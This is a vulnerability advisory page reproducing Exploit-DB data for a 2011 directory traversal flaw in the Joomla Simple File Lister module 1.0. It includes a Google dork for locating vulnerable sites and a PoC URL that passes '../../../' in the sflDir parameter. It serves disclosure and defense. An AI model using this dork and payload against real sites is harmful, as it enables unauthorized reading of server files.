Joomla Simple File Lister module

vendor:

Simple File Lister module

by:

evilsocket

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Simple File Lister module

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability

The vulnerability exists due to insufficient sanitization of the variable $sfl_dirlocation which contains the directory to be read. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. To look for a valid url, just sniff the HTTP request sent from the module javascript code once a directory is clicked.

Mitigation:

Input validation should be performed to ensure that the user supplied data is not malicious.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability
# Google Dork: "Simple File Lister v1.0" "Files in directory"
# Date: 2011-08-28
# Author: evilsocket ( evilsocket [at] gmail [dot] com )
# Software Link: http://extensions.joomla.org/extensions/core-enhancements/file-management/15793
# Version: 1.0

---------------
Vulnerable code
---------------

[ helper.php line 51 ]

function getDirContents($params, $sfl_dirlocation, $sfl_basepath, $sfl_maxfiles, $sfl_userlocation) {
  ...
  ...
  really messy code, generally speaking the variable $sfl_dirlocation which contains the directory to be
  read is not succesfully sanitized for relative paths
  ...
  ...


---
PoC
---

http://www.site.com/index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../

To look for a valid url, just sniff the HTTP request sent from the module javascript code once a directory is clicked.